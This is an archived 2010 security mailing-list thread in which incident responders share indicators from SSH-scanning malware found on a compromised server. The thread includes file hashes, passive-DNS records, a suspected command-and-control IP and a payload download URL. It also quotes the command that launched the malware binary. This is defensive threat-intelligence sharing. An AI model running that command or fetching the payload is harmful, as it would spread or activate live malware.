[nsp-sec] distributed ssh scanners again
Barry Greene
bgreene at senki.org
Wed Nov 3 14:15:54 EDT 2010
Here is what I'm seeing via pDNS on these two systems:
Found 10 RRs in 0.55 seconds.
bos.zt.ua. A 195.69.220.2
impuls.net.ua. A 195.69.220.2
impuls.zhitomir.ua. A 195.69.220.2
impuls.zt.ua. A 195.69.220.2
ns1.impuls.net.ua. A 195.69.220.2
test.zt.ua. A 195.69.220.2
www.kino.zt.ua. A 195.69.220.2
zhitomir.ua. A 195.69.220.2
zt.net.ua. A 195.69.220.2
zt.ua. A 195.69.220.2
Found 7 RRs in 0.56 seconds.
120.fastwebserver.de. A 217.79.181.30
domainsex.de. A 217.79.181.30
mail.opel-edv.de. A 217.79.181.30
mail.testamentsvollstreckungen.net. A 217.79.181.30
mail.wege-immobilien.de. A 217.79.181.30
opel-edv.de. A 217.79.181.30
wege-immobilien.de. A 217.79.181.30
On Nov 3, 2010, at 9:13 AM, Torsten Voss wrote:
> ----------- nsp-security Confidential --------
>
>
> * PGP Signed by an unverified key: 11/3/10 at 9:13:23 AM
>
> I thought it too, but on the system was no phpmyadmin installed. It is not
> clear which vulnerbility was used.
>
> Shure, you can share the information with your customers.
>
> Cheers,
> Torsten
>
> Am 03.11.2010 17:04, schrieb Smith, Donald:
>> Torsten, is it ok to share the fact that this is probably due to a vulnerable version of phpmyadmin internally and with customers?
>>
>>
>>
>> (coffee != sleep) & (!coffee == sleep)
>> Donald.Smith at qwest.com gcia
>>
>>> -----Original Message-----
>>> From: nsp-security-bounces at puck.nether.net
>>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
>>> Torsten Voss
>>> Sent: Wednesday, November 03, 2010 9:44 AM
>>> To: nsp-security at puck.nether.net
>>> Subject: Re: [nsp-sec] distributed ssh scanners again
>>>
>>> ----------- nsp-security Confidential --------
>>>
>> Hi,
>>
>> we've recieved the malware from an compromised system:
>>
>> The malware was started similar then the last one in summer:
>>
>> PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
>> 217.79.190.53 2 2>/dev/null >/dev/null
>>
>> 217.79.190.53 is probaly the C&C server for the distributed ssh scans
>>
>> The initial malware was probably downloaded at
>> http://195.69.220.2/a.txt
>>
>> Three files were found:
>> 60ccf6902bcc37550954383be1461041 barbut
>> 3f25289959d9fecc72cf24d2e300c97b dd_ssh
>> 30a1e1ae9d573b2daceb71f9ec8c0ce8 dtdss
>>
>> IP 195.69.220.2 is hardcoded in the dtdss file
>> IP 217.79.181.30 is included in the barbut file
>>
>> If someone would like a copy, please send us an email.
>>
>> Kind regards,
>> Torsten, AS680
>>
>>
>>>
>>>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>>>
> Please do not Forward, CC, or BCC this E-mail outside of the
> nsp-security
> community. Confidentiality is essential for effective
> Internet security counter-measures.
> _______________________________________________
>>>
>
>> This communication is the property of Qwest and may contain confidential or
>> privileged information. Unauthorized use of this communication is strictly
>> prohibited and may be unlawful. If you have received this communication
>> in error, please immediately notify the sender by reply e-mail and destroy
>> all copies of the communication and any attachments.
>
>
>
> --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
>
> Automatische Warnmeldungen https://www.cert.dfn.de/autowarn
>
> * Torsten Voss, DFN-CERT <voss at dfn-cert.de>
> * 0x29836EA9 - Unverified(L)
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list